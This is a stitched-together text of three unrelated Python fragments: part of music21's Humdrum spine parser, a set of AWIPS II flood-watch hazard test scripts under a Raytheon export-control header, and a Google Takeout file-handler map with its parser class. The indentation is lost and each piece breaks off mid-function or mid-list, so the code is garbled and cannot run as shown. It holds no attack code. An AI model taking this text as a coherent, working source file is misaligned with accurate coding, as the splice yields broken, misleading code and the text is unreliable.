>>> for thisSlice in protoSpines:
... print(thisSlice)
<music21.humdrum.spineParser.ProtoSpine object at 0x...>
<music21.humdrum.spineParser.ProtoSpine object at 0x...>
But looking at the individual slices is revealing:
>>> eventCollections[4].getAllOccurring()
[<music21.humdrum.spineParser.SpineEvent D8>, <music21.humdrum.spineParser.SpineEvent pp>]
'''
if self.eventList == []:
self.parseEventListFromDataStream()
## we make two lists: one of ProtoSpines (vertical slices) and
## one of Events(horizontal slices)
returnProtoSpines = []
returnEventCollections = []
for j in range(0, self.maxSpines):
protoSpineEventList = []
for i in range(0, self.fileLength):
# get the currentEventCollection
if j == 0:
thisEventCollection = EventCollection(self.maxSpines)
returnEventCollections.append(thisEventCollection)
else:
thisEventCollection = returnEventCollections[i]
# parse this cell
if self.eventList[i].isSpineLine is True:
# not a global event
if len(self.eventList[i].spineData) > j:
## are there actually this many spines at this point?
## thus, is there an event here? True
thisEvent = SpineEvent(self.eventList[i].spineData[j])
thisEvent.position = i
thisEvent.protoSpineId = j
if thisEvent.contents in spinePathIndicators:
thisEventCollection.spinePathData = True
protoSpineEventList.append(thisEvent)
thisEventCollection.addSpineEvent(j, thisEvent)
if thisEvent.contents == '.' and i > 0:
lastEvent = returnEventCollections[i-1].events[j]
if lastEvent is not None:
thisEventCollection.addLastSpineEvent(j, returnEventCollections[i-1].getSpineOccurring(j))
else: ## no data here
thisEvent = SpineEvent(None)
thisEvent.position = i
thisEvent.protoSpineId = j
thisEventCollection.addSpineEvent(j, thisEvent)
protoSpineEventList.append(None)
else: ## Global event -- either GlobalCommentLine or GlobalReferenceLine
if j == 0: ## adds to all spines but just runs the first time.
thisEventCollection.addGlobalEvent(self.eventList[i])
thisEvent = SpineEvent(None)
thisEvent.position = i
thisEvent.protoSpineId = j
thisEventCollection.addSpineEvent(j, thisEvent)
protoSpineEventList.append(None)
returnProtoSpines.append(ProtoSpine(protoSpineEventList))
self.protoSpines = returnProtoSpines
self.eventCollections = returnEventCollections
return (returnProtoSpines, returnEventCollections)
def createHumdrumSpines(self, protoSpines = None, eventCollections = None):
'''
Takes the data from the object's protoSpines and eventCollections
and returns a :class:`~music21.humdrum.spineParser.SpineCollection`
object that contains HumdrumSpine() objects.
A HumdrumSpine object differs from a ProtoSpine in that it follows
spinePathData -- a ProtoSpine records all data in a given tab
position, and thus might consist of data from several
spines that move around. HumdrumSpines are smart enough not to
have this limitation.
When we check for spinePathData we look for the following spine
path indicators (from HumdrumDoc)::
*+ add a new spine (to the right of the current spine)
*- terminate a current spine
*^ split a spine (into two)
*v join (two or more) spines into one
*x exchange the position of two spines
* do nothing
'''
        if protoSpines is None or eventCollections is None:
protoSpines = self.protoSpines
eventCollections = self.eventCollections
maxSpines = len(protoSpines)
# currentSpineList is a list of currently active
# spines ordered from left to right.
currentSpineList = common.defaultlist(lambda:None)
spineCollection = SpineCollection()
# go through the event collections line by line
for i in range(0, self.fileLength):
thisEventCollection = eventCollections[i]
for j in range(0, maxSpines):
thisEvent = protoSpines[j].eventList[i]
if thisEvent is not None: # something there
currentSpine = currentSpineList[j]
if currentSpine is None:
## first event after a None = new spine because
## Humdrum does not require *+ at the beginning
currentSpine = spineCollection.addSpine()
currentSpine.insertPoint = i
currentSpineList[j] = currentSpine
currentSpine.append(thisEvent)
# currentSpine.id is always unique in a spineCollection
thisEvent.protoSpineId = currentSpine.id
# check for spinePathData
# note that nothing else can happen in an eventCollection
# except spine path data if any spine has spine path data.
# thus, this is illegal. The C#4 will be ignored:
# *x *x C#4
if thisEventCollection.spinePathData is True:
newSpineList = common.defaultlist(lambda:None)
mergerActive = False
exchangeActive = False
for j in range(0, maxSpines):
thisEvent = protoSpines[j].eventList[i]
currentSpine = currentSpineList[j]
if thisEvent is None and currentSpine is not None:
## should this happen?
newSpineList.append(currentSpine)
elif thisEvent is None:
continue
elif thisEvent.contents == "*-": ## terminate spine
currentSpine.endingPosition = i
elif thisEvent.contents == "*^": ## split spine assume they are voices
newSpine1 = spineCollection.addSpine(streamClass = stream.Voice)
newSpine1.insertPoint = i+1
newSpine1.parentSpine = currentSpine
newSpine1.isFirstVoice = True
newSpine2 = spineCollection.addSpine(streamClass = stream.Voice)
newSpine2.insertPoint = i+1
newSpine2.parentSpine = currentSpine
currentSpine.endingPosition = i # will be overridden if merged
currentSpine.childSpines.append(newSpine1)
currentSpine.childSpines.append(newSpine2)
currentSpine.childSpineInsertPoints[i] = (newSpine1, newSpine2)
newSpineList.append(newSpine1)
newSpineList.append(newSpine2)
elif thisEvent.contents == "*v": #merge spine -- n.b. we allow non-adjacent lines to be merged. this is incorrect
if mergerActive is False: # per humdrum syntax, but is easily done.
# assume that previous spine continues
if currentSpine.parentSpine is not None:
mergerActive = currentSpine.parentSpine
else:
mergerActive = True
currentSpine.endingPosition = i
else: ## if second merger code is not found then a one-to-one spine "merge" occurs
currentSpine.endingPosition = i
# merge back to parent if possible:
if currentSpine.parentSpine is not None:
newSpineList.append(currentSpine.parentSpine)
# or merge back to other spine's parent:
elif mergerActive is not True: # other spine parent set
newSpineList.append(mergerActive)
# or make a new spine...
else:
s = spineCollection.addSpine(streamClass = stream.Part)
s.insertPoint = i
newSpineList.append(s)
mergerActive = False
elif thisEvent.contents == "*x": # exchange spine
if exchangeActive is False:
exchangeActive = currentSpine
else: ## if second exchange is not found, then both lines disappear and exception is raised
## n.b. we allow more than one PAIR of exchanges in a line so long as the first
## is totally finished by the time the second happens
newSpineList.append(currentSpine)
newSpineList.append(exchangeActive)
exchangeActive = False
else: ## null processing code "*"
newSpineList.append(currentSpine)
if exchangeActive is not False:
raise HumdrumException("ProtoSpine found with unpaired exchange instruction at line %d [%s]" % (i, thisEventCollection.events))
currentSpineList = newSpineList
return spineCollection
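The spine-path bookkeeping above can be illustrated with a toy counter that tracks how many spines are active after each indicator line. This is a deliberate simplification: it ignores spine ordering, exchange pairing, merge targets, and parent/child relationships, all of which `createHumdrumSpines` handles properly.

```python
def spine_count_after(indicator_lines, start):
    # toy bookkeeping only: *+ adds a spine, *- removes one, *^ splits one
    # into two, a run of k "*v" tokens merges k spines into one, and both
    # *x (exchange) and * (null) leave the count unchanged
    count = start
    for tokens in indicator_lines:
        count += tokens.count("*+")
        count -= tokens.count("*-")
        count += tokens.count("*^")
        merges = tokens.count("*v")
        if merges > 1:
            count -= merges - 1
    return count

# two spines: split the second, then merge the resulting pair back together
lines = [["*", "*^"], ["*", "*v", "*v"]]
print(spine_count_after(lines, start=2))
```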
def insertGlobalEvents(self):
'''
Insert the Global Events (GlobalReferenceLines and GlobalCommentLines) into an appropriate
place in the outer Stream.
Run after self.spineCollection.createMusic21Streams(). Is run automatically by self.parseLines().
uses self.spineCollection.getOffsetsAndPrioritiesByPosition()
'''
if hasattr(self, 'globalEventsInserted') and self.globalEventsInserted is True:
return
self.globalEventsInserted = True
positionDict = self.spineCollection.getOffsetsAndPrioritiesByPosition()
eventList = self.eventList
maxEventList = len(eventList)
numberOfGlobalEventsInARow = 0
insertList = []
appendList = []
for i, event in enumerate(eventList):
if event.isSpineLine is False:
numberOfGlobalEventsInARow += 1
insertOffset = None
insertPriority = 0
for j in range(i+1, maxEventList):
if j in positionDict:
insertOffset = positionDict[j][0]
# hopefully not more than 20 events in a row...
insertPriority = positionDict[j][1][0].priority - 40 + numberOfGlobalEventsInARow
break
if event.isReference is True:
# TODO: Fix GlobalReference
el = GlobalReference(event.code, event.value)
else:
el = GlobalComment(event.value)
##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: <NAME>
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
# ----------------------------------------------------------------------------
# This software is in the public domain, furnished "as is", without technical
# support, and with no warranty, express or implied, as to its usefulness for
# any purpose.
#
# Headlines Timing
#
# Author:
# ----------------------------------------------------------------------------
# set up to test area names and parts of states
# without locationName defined
areaT1 = """
AreaDictionary['FLZ050']['fullStateName'] = 'Florida'
AreaDictionary['FLZ050']['partOfState'] = 'western'
AreaDictionary['FLZ057']['fullStateName'] = 'Florida'
AreaDictionary['FLZ057']['partOfState'] = 'western'
AreaDictionary['FLZ160']['fullStateName'] = 'Florida'
AreaDictionary['FLZ160']['partOfState'] = 'central'
AreaDictionary['FLZ151']['fullStateName'] = 'Florida'
AreaDictionary['FLZ151']['partOfState'] = 'central'
AreaDictionary['FLZ043']['fullStateName'] = 'Florida'
AreaDictionary['FLZ043']['partOfState'] = 'central'
AreaDictionary['FLZ162']['fullStateName'] = 'Florida'
AreaDictionary['FLZ162']['partOfState'] = 'central'
AreaDictionary['FLZ165']['fullStateName'] = 'Florida'
AreaDictionary['FLZ165']['partOfState'] = 'central'
AreaDictionary['FLZ056']['fullStateName'] = 'Florida'
AreaDictionary['FLZ056']['partOfState'] = 'southern'
AreaDictionary['FLZ052']['fullStateName'] = 'Georgia'
AreaDictionary['FLZ052']['partOfState'] = 'western'
AreaDictionary['FLZ155']['fullStateName'] = 'Georgia'
AreaDictionary['FLZ155']['partOfState'] = 'western'
AreaDictionary['FLZ061']['fullStateName'] = 'Georgia'
AreaDictionary['FLZ061']['partOfState'] = 'southern'
AreaDictionary['FLZ148']['fullStateName'] = 'Georgia'
AreaDictionary['FLZ148']['partOfState'] = 'southern'
AreaDictionary['FLZ142']['fullStateName'] = 'South Carolina'
AreaDictionary['FLZ142']['partOfState'] = 'western'
AreaDictionary['FLZ043']['fullStateName'] = 'South Carolina'
AreaDictionary['FLZ043']['partOfState'] = 'western'
"""
#with location name defined
areaT2= """
AreaDictionary['FLZ050']['fullStateName'] = 'Florida'
AreaDictionary['FLZ050']['partOfState'] = 'western'
AreaDictionary['FLZ050']['locationName'] = 'Clearfield'
AreaDictionary['FLZ057']['fullStateName'] = 'Florida'
AreaDictionary['FLZ057']['partOfState'] = 'western'
AreaDictionary['FLZ057']['locationName'] = 'Clearfield'
AreaDictionary['FLZ160']['fullStateName'] = 'Florida'
AreaDictionary['FLZ160']['partOfState'] = 'central'
AreaDictionary['FLZ160']['locationName'] = 'Aunt Ruby'
AreaDictionary['FLZ151']['fullStateName'] = 'Florida'
AreaDictionary['FLZ151']['partOfState'] = 'central'
AreaDictionary['FLZ151']['locationName'] = 'Aunt Ruby'
AreaDictionary['FLZ043']['fullStateName'] = 'Florida'
AreaDictionary['FLZ043']['partOfState'] = 'central'
AreaDictionary['FLZ043']['locationName'] = 'Adams'
AreaDictionary['FLZ162']['fullStateName'] = 'Florida'
AreaDictionary['FLZ162']['partOfState'] = 'central'
AreaDictionary['FLZ162']['locationName'] = 'Adams'
AreaDictionary['FLZ165']['fullStateName'] = 'Florida'
AreaDictionary['FLZ165']['partOfState'] = 'central'
#AreaDictionary['FLZ165']['locationName'] = 'western'
AreaDictionary['FLZ056']['fullStateName'] = 'Florida'
AreaDictionary['FLZ056']['partOfState'] = 'southern'
AreaDictionary['FLZ056']['locationName'] = 'Tampa'
AreaDictionary['FLZ052']['fullStateName'] = 'Georgia'
AreaDictionary['FLZ052']['partOfState'] = 'western'
AreaDictionary['FLZ052']['locationName'] = 'Tampa'
AreaDictionary['FLZ155']['fullStateName'] = 'Georgia'
AreaDictionary['FLZ155']['partOfState'] = 'western'
AreaDictionary['FLZ155']['locationName'] = 'Atlanta'
AreaDictionary['FLZ061']['fullStateName'] = 'Georgia'
AreaDictionary['FLZ061']['partOfState'] = 'southern'
AreaDictionary['FLZ061']['locationName'] = 'Beach'
AreaDictionary['FLZ148']['fullStateName'] = 'Georgia'
AreaDictionary['FLZ148']['partOfState'] = 'southern'
AreaDictionary['FLZ148']['locationName'] = 'Beach'
AreaDictionary['FLZ142']['fullStateName'] = 'South Carolina'
AreaDictionary['FLZ142']['partOfState'] = 'western'
AreaDictionary['FLZ142']['locationName'] = 'South Park'
AreaDictionary['FLZ043']['fullStateName'] = 'South Carolina'
AreaDictionary['FLZ043']['partOfState'] = 'western'
AreaDictionary['FLZ043']['locationName'] = 'South Park'
"""
#for testing of parishes, counties, and areas
areaT3 = """
AreaDictionary['FLC017']['fullStateName'] = 'Louisiana'
AreaDictionary['FLC017']['partOfState'] = 'western'
AreaDictionary['FLC017']['independentCity'] = 1
AreaDictionary['FLC105']['fullStateName'] = 'Louisiana'
AreaDictionary['FLC105']['partOfState'] = 'western'
AreaDictionary['FLC027']['fullStateName'] = 'Louisiana'
AreaDictionary['FLC027']['partOfState'] = 'western'
AreaDictionary['FLC053']['fullStateName'] = 'Florida'
AreaDictionary['FLC053']['partOfState'] = 'western'
"""
areaT3FIPS0= '#Definition["areaType"] = "FIPS"'
areaT3FIPS1= 'Definition["areaType"] = "FIPS"'
scripts = [
{
"commentary": "Clear out all Hazards Table and Grids.",
"name": "Hazard_FFA_0",
"productType": None,
"clearHazardsTable": 1,
"checkStrings": [],
},
{
"commentary": "NEW FFA",
"name": "Hazard_FFA_1",
"drtTime": "20100101_0510",
"productType": "Hazard_FFA_Local",
"cmdLineVars": "{('Flood Reason', 'floodReason'): 'ER '}",
"createGrids": [
("Fcst", "Hazards", "DISCRETE", -100, 100, "<None>", "all"),
("Fcst", "Hazards", "DISCRETE", 0, 3, "FA.A", ["FLZ149"]),
],
"checkStrings": ["URGENT - IMMEDIATE BROADCAST REQUESTED",
"Flood Watch",
"National Weather Service Tampa Bay Ruskin FL",
"FLZ149-",
"/X.NEW.KTBW.FA.A.0001.100101T0510Z-100101T0800Z/",
"/00000.0.ER.000000T0000Z.000000T0000Z.000000T0000Z.OO/",
"Coastal Pasco-",
"1210 AM EST Fri Jan 1 2010",
"...FLOOD WATCH IN EFFECT UNTIL 3 AM EST EARLY THIS MORNING...",
"The National Weather Service in Tampa Bay Ruskin has issued a",
"* Flood Watch for a portion of west central Florida, including the following area, Coastal Pasco.",
"* Until 3 AM EST early this morning",
],
},
{
"commentary": "CON FFA",
"name": "Hazard_FFA_2",
"drtTime": "20100101_0530",
"productType": "Hazard_FFA_Local",
"cmdLineVars": "{('Flood Reason', 'floodReason'): 'SM '}",
"createGrids": [
("Fcst", "Hazards", "DISCRETE", -100, 100, "<None>", "all"),
("Fcst", "Hazards", "DISCRETE", 0, 3, "FA.A", ["FLZ149"]),
],
"checkStrings": ["Flood Watch",
"National Weather Service Tampa Bay Ruskin FL",
"FLZ149-",
"/X.CON.KTBW.FA.A.0001.000000T0000Z-100101T0800Z/",
"/00000.0.SM.000000T0000Z.000000T0000Z.000000T0000Z.OO/",
"...FLOOD WATCH REMAINS IN EFFECT UNTIL 3 AM EST EARLY THIS MORNING...",
"The Flood Watch continues for",
"* A portion of west central Florida, including the following area, Coastal Pasco.",
"* Until 3 AM EST early this morning",
],
},
{
"commentary": "EXA FFA",
"name": "Hazard_FFA_3",
"drtTime": "20100101_0700",
"productType": "Hazard_FFA_Local",
"cmdLineVars": "{('Flood Reason', 'floodReason'): 'DM '}",
"createGrids": [
("Fcst", "Hazards", "DISCRETE", -100, 100, "<None>", "all"),
("Fcst", "Hazards", "DISCRETE", 0, 3, "FA.A", ["FLZ149","FLZ057"]),
],
"checkStrings": ["URGENT - IMMEDIATE BROADCAST REQUESTED",
"Flood Watch",
"National Weather Service Tampa Bay Ruskin FL",
"FLZ057-",
"/X.EXA.KTBW.FA.A.0001.000000T0000Z-100101T0800Z/",
"/00000.0.DM.000000T0000Z.000000T0000Z.000000T0000Z.OO/",
"...FLOOD WATCH IN EFFECT UNTIL 3 AM EST EARLY THIS MORNING...",
"The National Weather Service in Tampa Bay Ruskin has expanded the",
"* Flood Watch to include a portion of south central Florida, including the following area, Highlands.",
"* Until 3 AM EST early this morning",
"FLZ149-",
"/X.CON.KTBW.FA.A.0001.000000T0000Z-100101T0800Z/",
"/00000.0.DM.000000T0000Z.000000T0000Z.000000T0000Z.OO/",
"...FLOOD WATCH REMAINS IN EFFECT UNTIL 3 AM EST EARLY THIS MORNING...",
"The Flood Watch continues for",
"* A portion of west central Florida, including the following area, Coastal Pasco.",
"* Until 3 AM EST early this morning",
],
},
{
"commentary": "CAN FFA, NEW FFA",
"name": "Hazard_FFA_4",
"drtTime": "20100101_0720",
"productType": "Hazard_FFA_Local",
"cmdLineVars": "{('Flood Reason', 'floodReason'): 'IJ '}",
"createGrids": [
("Fcst", "Hazards", "DISCRETE", -100, 100, "<None>", "all"),
("Fcst", "Hazards", "DISCRETE", 0, 8, "FF.A", ["FLZ057"]),
("Fcst", "Hazards", "DISCRETE", 24, 32, "FF.A", ["FLZ057"]),
],
"checkStrings": ["URGENT - IMMEDIATE BROADCAST REQUESTED",
"Flood Watch",
"National Weather Service Tampa Bay Ruskin FL",
"FLZ057-",
"/X.CAN.KTBW.FA.A.0001.000000T0000Z-100101T0800Z/",
"/X.NEW.KTBW.FF.A.0001.100101T0720Z-100101T1300Z/",
"/X.NEW.KTBW.FF.A.0002.100102T0500Z-100102T1300Z/",
"/00000.0.IJ.000000T0000Z.000000T0000Z.000000T0000Z.OO/",
"...FLASH FLOOD WATCH IN EFFECT UNTIL 8 AM EST THIS MORNING...",
"...FLASH FLOOD WATCH IN EFFECT FROM LATE TONIGHT THROUGH SATURDAY MORNING...",
"...FLOOD WATCH IS CANCELLED...",
"The National Weather Service in Tampa Bay Ruskin has issued a",
"* Flash Flood Watch for a portion of south central Florida, including the following area, Highlands.",
"* Until 8 AM EST this morning",
"The National Weather Service in Tampa Bay Ruskin has issued a",
"* Flash Flood Watch for a portion of south central Florida, including the following area, Highlands.",
"* From late tonight through Saturday morning",
"The Flood Watch for a portion of south central Florida has been cancelled.",
"FLZ149-",
"/X.CAN.KTBW.FA.A.0001.000000T0000Z-100101T0800Z/",
"/00000.0.IJ.000000T0000Z.000000T0000Z.000000T0000Z.OO/",
"...FLOOD WATCH IS CANCELLED...",
"The Flood Watch for a portion of west central Florida has been cancelled."
],
},
{
"commentary": "EXP FFA, 2 NEW FFA",
"name": "Hazard_FFA_5",
"drtTime": "20100101_1300",
"productType": "Hazard_FFA_Local",
"cmdLineVars": "{('Flood Reason', 'floodReason'): 'FS '}",
"createGrids": [
("Fcst", "Hazards", "DISCRETE", -100, 100, "<None>", "all"),
("Fcst", "Hazards", "DISCRETE", 24, 32, "FF.A", ["FLZ057"]),
("Fcst", "Hazards", "DISCRETE", 46, 62, "FF.A", ["FLZ057"]),
("Fcst", "Hazards", "DISCRETE", 45, 46, "FA.A", ["FLZ149"]),
("Fcst", "Hazards", "DISCRETE", 46, 62, "FA.A", ["FLZ149"]),
("Fcst", "Hazards", "DISCRETE", 62, 68, "FA.A", ["FLZ149"]),
],
"checkStrings": ["URGENT - IMMEDIATE BROADCAST REQUESTED",
"Flood Watch",
"National Weather Service Tampa Bay Ruskin FL",
"FLZ057-",
"/X.EXP.KTBW.FF.A.0001.000000T0000Z-100101T1300Z/",
"/X.NEW.KTBW.FF.A.0003.100103T0300Z-100103T1900Z/",
"/X.CON.KTBW.FF.A.0002.100102T0500Z-100102T1300Z/",
"/00000.0.FS.000000T0000Z.000000T0000Z.000000T0000Z.OO/",
"...FLASH FLOOD WATCH REMAINS IN EFFECT FROM LATE TONIGHT THROUGH SATURDAY MORNING...",
"...FLASH FLOOD WATCH IN EFFECT FROM SATURDAY EVENING THROUGH SUNDAY AFTERNOON...",
"...FLASH FLOOD WATCH HAS EXPIRED...",
"The Flash Flood Watch continues for",
"* A portion of south central Florida, including the following area, Highlands.",
"* From late tonight through Saturday morning",
"The National Weather Service in Tampa Bay Ruskin has issued a",
"* Flash Flood Watch for a portion of south central Florida, including the following area, Highlands.",
"* From Saturday evening through Sunday afternoon",
"The Flash Flood Watch for a portion of south central Florida has expired.",
"FLZ149-",
"/X.NEW.KTBW.FA.A.0002.100103T0200Z-100104T0100Z/",
"/00000.0.FS.000000T0000Z.000000T0000Z.000000T0000Z.OO/",
"...FLOOD WATCH IN EFFECT FROM SATURDAY EVENING THROUGH SUNDAY EVENING...",
"The National Weather Service in Tampa Bay Ruskin has issued a",
"* Flood Watch for a portion of west central Florida, including the following area, Coastal Pasco.",
"* From Saturday evening through Sunday evening",
],
},
{
"commentary": "CON test of multiple events",
"name": "Hazard_FFA_6",
"drtTime": "20100102_0300",
"productType": "Hazard_FFA_Local",
"cmdLineVars": "{('Flood Reason', 'floodReason'): 'RS '}",
"createGrids": [
("Fcst", "Hazards", "DISCRETE", -100, 100, "<None>", "all"),
("Fcst", "Hazards", "DISCRETE", 24, 32, "FF.A", ["FLZ057"]),
("Fcst", "Hazards", "DISCRETE", 46, 62, "FF.A", ["FLZ057"]),
("Fcst", "Hazards", "DISCRETE", 45, 46, "FA.A", ["FLZ149"]),
("Fcst", "Hazards", "DISCRETE", 46, 62, "FA.A", ["FLZ149"]),
("Fcst", "Hazards", "DISCRETE", 62, 68, "FA.A", ["FLZ149"]),
],
"checkStrings": ["Flood Watch",
"National Weather Service Tampa Bay Ruskin FL",
"FLZ057-",
"/X.CON.KTBW.FF.A.0002.100102T0500Z-100102T1300Z/",
"/X.CON.KTBW.FF.A.0003.100103T0300Z-100103T1900Z/",
"/00000.0.RS.000000T0000Z.000000T0000Z.000000T0000Z.OO/",
"...FLASH FLOOD WATCH REMAINS IN EFFECT UNTIL 8 AM EST SATURDAY...",
"...FLASH FLOOD WATCH REMAINS IN EFFECT FROM SATURDAY EVENING THROUGH SUNDAY AFTERNOON...",
"The Flash Flood Watch continues for",
"* A portion of south central Florida, including the following area, Highlands.",
"* Until 8 AM EST Saturday",
"The Flash Flood Watch continues for",
"* A portion of south central Florida, including the following area, Highlands.",
"* From Saturday evening through Sunday afternoon",
"FLZ149-",
"/X.CON.KTBW.FA.A.0002.100103T0200Z-100104T0100Z/",
"/00000.0.RS.000000T0000Z.000000T0000Z.000000T0000Z.OO/",
"...FLOOD WATCH REMAINS IN EFFECT FROM SATURDAY EVENING THROUGH SUNDAY EVENING...",
"The Flood Watch continues for",
"* A portion of west central Florida, including the following area, Coastal Pasco.",
"""
This handles mapping the filenames in the export
to the corresponding functions and caching the results
"""
import os
import re
from pathlib import Path
from typing import (
Iterator,
Dict,
Callable,
Any,
Optional,
List,
Type,
Tuple,
cast,
)
from collections import defaultdict
from cachew import cachew
from .compat import Literal
from .common import Res, PathIsh
from .cache import takeout_cache_path
from .log import logger
from .models import BaseEvent
from .parse_html.activity import _parse_html_activity
from .parse_html.comment import _parse_html_comment_file
from .parse_json import (
_parse_likes,
_parse_app_installs,
_parse_json_activity,
_parse_location_history,
_parse_chrome_history,
)
# anything that subclasses BaseEvent
BaseResults = Iterator[Res[BaseEvent]]
HandlerFunction = Callable[[Path], BaseResults]
HandlerMap = Dict[str, Optional[HandlerFunction]]
_CacheKeySingle = Type[BaseEvent]
CacheKey = _CacheKeySingle
def _cache_key_to_str(c: CacheKey) -> str:
return str(c.__name__).casefold()
def _parse_handler_return_type(handler: HandlerFunction) -> CacheKey:
assert hasattr(
handler, "return_type"
), f"Handler functions should have a 'return_type' attribute which specifies what type this produces. See parse_json.py for an example. No 'return_type' on {handler}"
val: Any = getattr(handler, "return_type")
assert isinstance(val, type), f"{val} is not a type"
assert BaseEvent in val.__mro__, f"{val} not a subclass of BaseEvent"
return cast(_CacheKeySingle, val)
# If parsed, should mention:
# Google Help Communities
# - Select JSON as Output
# Google Play Books
# - Select JSON as Output
# Google Play Games Services
# - Select JSON as Output
# Google Play Movies & TV options
# - Select JSON as Output
# Profile
# - Select JSON as Output
# Note: when I say 'no info here' or 'not useful', that's just how the
# data appears in my export. It might be useful for you -- if so
# feel free to make a PR or an issue to parse it
#
# These can also be extended or overridden: pass 'None'
# if you don't want a certain part to be parsed,
# or pass your own function which parses the file into something from models.py
# Reminder that dicts are ordered, so order here can matter
# If you want to parse one file from a folder with lots of files, you can
# specify that file, and then on the next line specify 'None'
# for the folder, ignoring the rest of its files
# Setting 'None' in the handler map specifies that we should ignore this file
DEFAULT_HANDLER_MAP: HandlerMap = {
r"Chrome/BrowserHistory.json": _parse_chrome_history,
r"Chrome": None, # Ignore rest of Chrome stuff
r"Google Play Store/Installs.json": _parse_app_installs,
r"Google Play Store/": None, # ignore anything else in Play Store
r"Location History/Semantic Location History/.*": None, # not that much data here. maybe parse it?
# optional space to handle pre-2017 data
r"Location History/Location( )?History.json": _parse_location_history, # old path to Location History
r"Location History/Records.json": _parse_location_history, # new path to Location History
r"Location History/Settings.json": None,
# HTML/JSON activity-like files which aren't in 'My Activity'
# optional " and Youtube Music" to handle pre-2017 data
r"YouTube( and YouTube Music)?/history/.*?.html": _parse_html_activity,
r"YouTube( and YouTube Music)?/history/.*?.json": _parse_json_activity,
# basic list item files which have chat messages/comments
r"YouTube( and YouTube Music)?/my-comments/.*?.html": _parse_html_comment_file,
r"YouTube( and YouTube Music)?/my-live-chat-messages/.*?.html": _parse_html_comment_file,
r"YouTube( and YouTube Music)?/playlists/likes.json": _parse_likes,
r"YouTube( and YouTube Music)?/playlists/": None,
r"YouTube( and YouTube Music)?/subscriptions": None,
r"YouTube( and YouTube Music)?/videos": None,
r"YouTube( and YouTube Music)?/music-uploads": None,
r"My Activity/Assistant/.*.mp3": None, # might be interesting to extract timestamps
r"My Activity/Voice and Audio/.*.mp3": None,
r"My Activity/Takeout": None, # activity for when you made takeouts, don't need
# HTML 'My Activity' Files
r"My Activity/.*?My\s*Activity.html": _parse_html_activity,
r"My Activity/.*?My\s*Activity.json": _parse_json_activity,
# Maybe parse these?
r"Access Log Activity": None,
r"Assistant Notes and Lists/.*.csv": None,
r"Blogger/Comments/.*?feed.atom": None,
r"Blogger/Blogs/": None,
# Fit has possibly interesting data
# Fit/Daily activity metrics/2015-07-27.csv
# Fit/Activities/2017-10-29T23_08_59Z_PT2M5.699S_Other.tcx
# Fit/All Data/derived_com.google.calories.bmr_com.google.and.json
r"Fit/": None,
r"Groups": None,
r"Google Play Games Services/Games/.*/(Achievements|Activity|Experience|Scores).html": None,
r"Hangouts": None,
r"Keep": None,
r"Maps (your places)": None,
r"My Maps/.*.kmz": None, # custom KML maps
r"Saved/.*.csv": None, # lists with saved places from Google Maps
r"Shopping Lists/.*.csv": None,
r"Tasks": None,
# Files to ignore
r"Android Device Configuration Service/": None,
r"Blogger/Albums/": None,
r"Blogger/Profile/": None,
r"Calendar/": None,
r"Cloud Print/": None,
r"Contacts/": None,
r"Drive/": None,
r"Google Account/": None,
r"Google Business Profile/": None,
r"Google My Business/": None,
r"Google Pay/": None,
r"Google Photos/": None, # has images/some metadata on each of them
r"Google Play Books/.*.pdf": None,
r"Google Play Games Services/Games/.*/(Data.bin|Metadata.html)": None,
r"Google Play Movies.*?/": None,
r"Google Shopping/": None,
r"Google Store/": None,
r"Google Translator Toolkit/": None,
r"Google Workspace Marketplace/": None,
r"Home App/": None,
r"Mail/": None,
r"Maps/": None,
r"News/": None,
r"Profile/Profile.json": None,
r"Saved/Favorite places.csv": None,
r"Search Contributions/": None,
r"archive_browser.html": None, # description of takeout, not that useful
}
HandlerMatch = Res[Optional[HandlerFunction]]
ErrorPolicy = Literal["yield", "raise", "drop"]
class TakeoutParser:
def __init__(
self,
takeout_dir: PathIsh,
cachew_identifier: Optional[str] = None,
warn_exceptions: bool = True,
error_policy: ErrorPolicy = "yield",
additional_handlers: Optional[HandlerMap] = None,
) -> None:
"""
takeout_dir: Path to the google takeout directory
cachew_identifier: some unique string that identifies this takeout
If not given, approximates using the full path. Useful if you're
temporarily extracting the zipfile to extract events or if the
Takeout dir path isn't at its regular location
error_policy: How to handle exceptions while parsing:
"yield": return as part of the results (default)
"raise": raise exceptions
"drop": drop/ignore exceptions
"""
# isinstance check to avoid messing up objects which mimic Path (e.g. zip wrappers)
takeout_dir = takeout_dir if isinstance(takeout_dir, Path) else Path(takeout_dir)
self.takeout_dir = takeout_dir.absolute()
if not self.takeout_dir.exists():
raise FileNotFoundError(f"{self.takeout_dir} does not exist!")
self.cachew_identifier: Optional[str] = cachew_identifier
self.additional_handlers = (
{} if additional_handlers is None else additional_handlers
)
self.error_policy: ErrorPolicy = error_policy
self.warn_exceptions = warn_exceptions
self._warn_if_no_activity()
def _warn_if_no_activity(self) -> None:
# most common is probably 'My Activity'?
# can be used as a check to see if the user passed a wrong directory
activity_dir = "My Activity"
expected = self.takeout_dir / activity_dir
if not expected.exists():
logger.warning(
f"Warning: given '{self.takeout_dir}', expected the '{activity_dir}' directory at '{expected}'. Perhaps you passed the wrong location?"
)
@staticmethod
def _match_handler(p: Path, handler: HandlerMap) -> HandlerMatch:
"""
Match one of the handler regexes to a function which parses the file
"""
assert not p.is_absolute(), p # should be relative to Takeout dir
# replace OS-specific (e.g. windows) path separator to match the handler
sf = str(p).replace(os.sep, "/")
for prefix, h in handler.items():
# regex match the map (e.g. above)
if bool(re.match(prefix, sf)):
return h # could be None, if chosen to ignore
else:
return RuntimeError(f"No function to handle parsing {sf}")
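The for/else plus errors-as-values pattern used by `_match_handler` can be exercised standalone; a sketch with a toy handler map (string stand-ins replace the real parser functions):

```python
import re
from typing import Dict, Optional, Union


def match_handler(relpath: str,
                  handlers: Dict[str, Optional[str]]) -> Union[Optional[str], Exception]:
    # first regex that matches wins, so order in the map matters;
    # the error is returned rather than raised, letting the caller
    # fall through to another handler map
    for pattern, h in handlers.items():
        if re.match(pattern, relpath):
            return h
    else:
        return RuntimeError(f"No function to handle parsing {relpath}")


toy_map = {
    r"Chrome/BrowserHistory.json": "parse_chrome_history",
    r"Chrome": None,  # ignore the rest of Chrome/
}
```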
# TODO: cache? may run into issues though
